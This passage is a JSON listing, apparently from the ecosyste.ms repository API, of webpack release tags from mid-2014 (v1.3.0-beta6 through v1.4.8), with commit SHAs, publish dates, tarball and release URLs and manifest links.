v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts